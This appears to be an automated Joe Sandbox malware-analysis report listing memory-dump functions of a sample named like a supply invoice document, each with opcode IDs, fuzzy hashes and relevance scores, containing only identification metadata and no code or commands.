                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryHash
                                                                                                                                • API String ID: 0-2202222882
                                                                                                                                • Opcode ID: 0768dc585b8f19496c8cdbcd4c842efcbef61cbe29853d5cc3516d814f9a66e3
                                                                                                                                • Instruction ID: c448ec2ca7a129b45ca8c8f7ea194b66acc34df30e171d8dd1f226e3e20176b9
                                                                                                                                • Opcode Fuzzy Hash: 0768dc585b8f19496c8cdbcd4c842efcbef61cbe29853d5cc3516d814f9a66e3
                                                                                                                                • Instruction Fuzzy Hash: 864142B1D4052EABDF21DA50DC84FDEF77CAB49724F0045A5AB08AB144DB709E898FA4
                                                                                                                                Function 01796B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #
                                                                                                                                • API String ID: 0-1885708031
                                                                                                                                • Opcode ID: 7f36ca8a8f75e3c2490e90a80ec03199db61eebcd46880b097d4d398be8ac9de
                                                                                                                                • Instruction ID: 73d367a04ac1e47cd2e965ccadb55e512b885502e95a398455d73daae25f39ff
                                                                                                                                • Opcode Fuzzy Hash: 7f36ca8a8f75e3c2490e90a80ec03199db61eebcd46880b097d4d398be8ac9de
                                                                                                                                • Instruction Fuzzy Hash: 94311631A007999BEF22DF69D854BAEFBA8DF06704F144168F941AB282D775F809CB50
                                                                                                                                Function 0177CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: BinaryName
                                                                                                                                • API String ID: 0-215506332
                                                                                                                                • Opcode ID: b2c3e29a7ac6f39ac373cdb4f84dea1240ead5041674bdea7eb411b8419063f8
                                                                                                                                • Instruction ID: 0291026dce13fbefff005131dbfca850d1c866a3117b16c8520739db5bac2195
                                                                                                                                • Opcode Fuzzy Hash: b2c3e29a7ac6f39ac373cdb4f84dea1240ead5041674bdea7eb411b8419063f8
                                                                                                                                • Instruction Fuzzy Hash: E7310336900516AFEF16DB58C845E7FFB74EB88720F114169B901AB260D7309E04EBE0
                                                                                                                                Function 0178892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0178895E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                                • API String ID: 0-702105204
                                                                                                                                • Opcode ID: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
                                                                                                                                • Instruction ID: 9c5b679add9202dcc16ee14aea5ae02d5a0aef5e7e1c94afd6768d3987ae1630
                                                                                                                                • Opcode Fuzzy Hash: 171caa5f60afc57610ef6b85baf29a8ad9118bbd02c26c90582b54d6060dbffd
                                                                                                                                • Instruction Fuzzy Hash: 110126762883019BE7317B5ACC88B6BFFA9EF81364B44012CF7811A156CF20A840C797
                                                                                                                                Function 017A2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 459c99dbf5b7950bdc0dd0aad2683d8ff5f42e8423abc94defde5cb5186f0bcd
                                                                                                                                • Instruction ID: 46ccd3a6ee58a4fd1a1d2089a0e8fbf7685ea14497d1e49b69c0bc4ad0398363
                                                                                                                                • Opcode Fuzzy Hash: 459c99dbf5b7950bdc0dd0aad2683d8ff5f42e8423abc94defde5cb5186f0bcd
                                                                                                                                • Instruction Fuzzy Hash: 7042D5316083419FE725CF68C890A6BFBE5BFC8700F980A2DFA8697252D771D945CB52
                                                                                                                                Function 01798158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 56e0f5d7ffece4872d647d70f6114eb4aef8e1cf45d2bd0d9041658c602fe953
                                                                                                                                • Instruction ID: 312e2863ae7a49aa063db482e33ab72074cb74e7ae543d5709734c07d07c3468
                                                                                                                                • Opcode Fuzzy Hash: 56e0f5d7ffece4872d647d70f6114eb4aef8e1cf45d2bd0d9041658c602fe953
                                                                                                                                • Instruction Fuzzy Hash: 44426B75A102198FEF24CF69C881BADFBF5BF49310F188099E949EB242D7349985CF61
                                                                                                                                Function 01712840 Relevance: .6, Instructions: 605COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 1cc0c7be7bf5bb86407ec5cf142dc9b0280d372cd04e9e9be5ddd8fdd9b589c6
                                                                                                                                • Instruction ID: 3a7a8cdfa83184117fc6d982633ba4f560aaf92cf66975b87e5eb3b4e60e602b
                                                                                                                                • Opcode Fuzzy Hash: 1cc0c7be7bf5bb86407ec5cf142dc9b0280d372cd04e9e9be5ddd8fdd9b589c6
                                                                                                                                • Instruction Fuzzy Hash: 2532CD70A007568FDB25CF69C8447BEFBFABF84704F64811DE8869B289D735A841CB50
                                                                                                                                Function 017AA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c88cb256e0fa29d12e100c0c5bce1085db11a3ed85906ed03e9ccab48f5f6116
                                                                                                                                • Instruction ID: 44df16908df9eacc75991f6da011623c352927ea33991a627fa46acbd9e6aee6
                                                                                                                                • Opcode Fuzzy Hash: c88cb256e0fa29d12e100c0c5bce1085db11a3ed85906ed03e9ccab48f5f6116
                                                                                                                                • Instruction Fuzzy Hash: D422D2706046618FEB25CF2DC094772FBF1AFC4300F98869AE9968F286D735E452DB61
                                                                                                                                Function 01706A50 Relevance: .5, Instructions: 548COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: aa67e5ae93c5b4f9369f4a1b4ad6d3fb568bf2c1fdbd27826ee5643815de6d83
                                                                                                                                • Instruction ID: 77f5aa7bc90a689a8d9ca18bd5f684b273145f65f7fdb308d74a3ab94787b8eb
                                                                                                                                • Opcode Fuzzy Hash: aa67e5ae93c5b4f9369f4a1b4ad6d3fb568bf2c1fdbd27826ee5643815de6d83
                                                                                                                                • Instruction Fuzzy Hash: 79329B71A04705CFDB26CF68C494AAAFBF5FF88310F2485A9E956AB391D730E851CB50
                                                                                                                                Function 01724A35 Relevance: .4, Instructions: 423COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                • Instruction ID: 5e35bf3877ff473b70f4e0157077d9154b153bf34e258be29665172bd93a5b06
                                                                                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                                                • Instruction Fuzzy Hash: 3AF15071E0022A9BDB15CFA9C594BAEFBF9BF48710F048169E906EB345E774D842CB50
                                                                                                                                Function 0179892B Relevance: .4, Instructions: 386COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 70103bcbe4dd0a593b75d3b1f350abf793d12d28d369cae98f7d11f5d3293f8d
                                                                                                                                • Instruction ID: a02f32ea91d8a7d2c6133364d307a5abc5965ee194e292e51f13fd0d58f94c29
                                                                                                                                • Opcode Fuzzy Hash: 70103bcbe4dd0a593b75d3b1f350abf793d12d28d369cae98f7d11f5d3293f8d
                                                                                                                                • Instruction Fuzzy Hash: 24D10271A0060E8BDF05CF68D841ABEF7F1AF89314F18816AD955E7241E739EA09CB61
                                                                                                                                Function 017065D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e7fc66bfa6b0c6f522860fd471b2f3204eb6d401216c85d34d7847feb4e7a602
                                                                                                                                • Instruction ID: e284a6a2757177bc9d934688a980edb9ee37728b369eeee273a03540d405f610
                                                                                                                                • Opcode Fuzzy Hash: e7fc66bfa6b0c6f522860fd471b2f3204eb6d401216c85d34d7847feb4e7a602
                                                                                                                                • Instruction Fuzzy Hash: 44E18B71608342CFC716CF28C4A4A6AFBE0BF89314F15896DF99587391EB31E915CB92
                                                                                                                                Function 016F8397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7bdadebf4e677bf9223cc9f3bd736b149512c38a304354d6aa306fff85f471e3
                                                                                                                                • Instruction ID: f1835bc9268affb6abaee793a03b942f1c4d5fa4ec3d751cc76af5e536da7982
                                                                                                                                • Opcode Fuzzy Hash: 7bdadebf4e677bf9223cc9f3bd736b149512c38a304354d6aa306fff85f471e3
                                                                                                                                • Instruction Fuzzy Hash: 18D1E471A00206DBDB14DF68CC90BBEB7AAFF54304F15466DEA16DB280EB74E951CB60
                                                                                                                                Function 01788243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                • Instruction ID: 5b4d3ff1f754143469298a8e70e9b01318cc280123284851df776bb678204b07
                                                                                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                • Instruction Fuzzy Hash: 66B1AF75A40609AFDF24EF98C944FABFBB9BF84304F90446DAA02D7795DA30E905CB11
                                                                                                                                Function 01710535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                • Instruction ID: 953b1e3b82f84b77a207cc958b39b2a0533c61b835027ac7fe873d84e55bcbb3
                                                                                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                • Instruction Fuzzy Hash: 6DB1E8316006469FDB25DB6CC854BBEFBFAAF44300F280599EA52DB289D730DD81DB50
                                                                                                                                Function 017083C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 991cb6fcbc25549a9509ec54726d4a82c56be42f33de62ea542843688ea80f88
                                                                                                                                • Instruction ID: a1b10d43f0b0da53ab6e6dbeeeabec0d28c095fe3478d7302dc320edacc382f3
                                                                                                                                • Opcode Fuzzy Hash: 991cb6fcbc25549a9509ec54726d4a82c56be42f33de62ea542843688ea80f88
                                                                                                                                • Instruction Fuzzy Hash: 7BC16670608381CFE760CF18C494BAAF7E8BF88304F54496DE98987391D775E908CB92
                                                                                                                                Function 016FC427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
                                                                                                                                • Instruction ID: 79448f5816294219697b69841b918cb784c6e396efe1e44da65b6157c2cda653
                                                                                                                                • Opcode Fuzzy Hash: 0ba55c0aa12b24384e36899155c3f66af3c37938b9b809c49c16375a0d1fc8a7
                                                                                                                                • Instruction Fuzzy Hash: FCB16370A002698BDB74DF58CC94BA9B7B2EF44700F0485EDD64AE7241EB70DD86CB24
                                                                                                                                Function 0172E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3470db46cda81d8d9b61fa9d29713b8f03fe7cca249520c89c2fd516317f96f6
                                                                                                                                • Instruction ID: 863c431918a10173fea06476720cdd5a5a6668c3fec9a9ece72df1565accfc36
                                                                                                                                • Opcode Fuzzy Hash: 3470db46cda81d8d9b61fa9d29713b8f03fe7cca249520c89c2fd516317f96f6
                                                                                                                                • Instruction Fuzzy Hash: E5A13531E00625AFEB32DB68D858FAEFBB8FB01714F050165EE01AB285DB749D41CB91
                                                                                                                                Function 01740185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                                • Instruction ID: e4aad7cec1895816675f879136637580fb6542a4a9d733707840129f437ab6e1
                                                                                                                                • Opcode Fuzzy Hash: b4e18927e14a5fe76b4c4a67d188ead4bd5aa25c2061710926e4945aa430b8f4
                                                                                                                                • Instruction Fuzzy Hash: DCA1BE70B016169BDB25DF69C994BAAF7B1FF44328F104129EB05DB282EB34E811CB90
                                                                                                                                Function 017D4500 Relevance: .3, Instructions: 275COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                                • Instruction ID: 2cfce50a58875c26c12542da79ee6daa0e329486426f89f546c805d041220019
                                                                                                                                • Opcode Fuzzy Hash: 9c5b938d3bd68b14b382ff266fa6908dd26159dd385661379b8a71bba9e54f4a
                                                                                                                                • Instruction Fuzzy Hash: EAA1C972A04206AFC722DF18C984B2AFBF9FF48754F150928F58A9BA55D330E900CB91
                                                                                                                                Function 017D2B57 Relevance: .3, Instructions: 266COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                • Instruction ID: e3b1cb26fd8c096fad9c0a6de513ec7bf87c6c951d302c831bbe95e8873edc43
                                                                                                                                • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                                • Instruction Fuzzy Hash: C2B11971E0061ADFDF29CFA9C880AADFBB5FF48310F148169E915A7356D730A946CB90
                                                                                                                                Function 017860E0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                                • Instruction ID: 34fb5bc67ca829b6c11cf9d842d8f3aa4bd63934d1f28368715dc865de743e84
                                                                                                                                • Opcode Fuzzy Hash: 483afce738c043530a58b650e338056b924329180e9b1885a54f73f95534633e
                                                                                                                                • Instruction Fuzzy Hash: B391C071D40216BFDB15EFA8D884BAEFFB5AB48710F1541A9F610EB345D734E9009BA0
                                                                                                                                Function 0171E3F0 Relevance: .3, Instructions: 261COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 37d56b5007d2aa3179b8fc4b325cb2facdf47a4b3b87f485019b468648bc85d1
                                                                                                                                • Instruction ID: fb26a004178b57e28be7254e8682c7229cada47b4c49f88caac38235423c3832
                                                                                                                                • Opcode Fuzzy Hash: 37d56b5007d2aa3179b8fc4b325cb2facdf47a4b3b87f485019b468648bc85d1
                                                                                                                                • Instruction Fuzzy Hash: 08913471A00212CFEB26DB6CC884B7EFBB5EF94714F2580A9EE059B349EA34D941C751
                                                                                                                                Function 01756ACC Relevance: .2, Instructions: 226COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                                • Instruction ID: ee77cf0acf567c60df56e83df41f5b695e3bf0619db1d25552435c864c92ab28
                                                                                                                                • Opcode Fuzzy Hash: 289ed07118d18eceeb1ef8f5f49a88d1da26f61c019a854db3dd565e80a12498
                                                                                                                                • Instruction Fuzzy Hash: 2281A271E006169BDB68CF69C940ABEFBF9FB48700F54852EE845E7640E774E940CBA4
                                                                                                                                Function 017CAB40 Relevance: .2, Instructions: 222COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                • Instruction ID: 50559d20320d53766b0e260b6ad0a59367743853dbe85830a25623bde41758d4
                                                                                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                                                                • Instruction Fuzzy Hash: 6C819231A0020A9FDF19CF98C894AAEFBB2FF84711F14856DD9169B349EB74E941CB40
                                                                                                                                Function 0173E284 Relevance: .2, Instructions: 212COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                                • Instruction ID: e5a1e8641521cbd73c05cd82ab2836c37dd5263f05139c3958f1ab554f4258fc
                                                                                                                                • Opcode Fuzzy Hash: a7b3228a0c7c13807e329fda34996fdd237b93cc04a78b4107191e119a86d7d8
                                                                                                                                • Instruction Fuzzy Hash: 9A814F71A01609AFDB26CFA9C880BEEFBB9FF88354F144429E555A7251DB30AC45CB60
                                                                                                                                Function 0171C640 Relevance: .2, Instructions: 206COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7994f3042f155499e08980668fb5b390a7b316e63ea80d7605cc27ffcbf99276
                                                                                                                                • Instruction ID: c16b63643c7e9bdf6f5bd09e36b8e12c42c96dc2d13b5ae72b030ea3cb44e71e
                                                                                                                                • Opcode Fuzzy Hash: 7994f3042f155499e08980668fb5b390a7b316e63ea80d7605cc27ffcbf99276
                                                                                                                                • Instruction Fuzzy Hash: E871ACB5D04629DBCB26CF98D9907BEFBB4FF68710F14815AE942AB354D3709840CBA1
                                                                                                                                Function 017B47A0 Relevance: .2, Instructions: 202COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
                                                                                                                                • Instruction ID: 9cabe81d5136d850519b89ed0125765eb21bec7d6aa6ec44821e65d6f155ece7
                                                                                                                                • Opcode Fuzzy Hash: 8cf0d2f4d2e326fc63135bdd0b718ca9bc7c6bcb7119d2ca1a2ed6cc6595e33c
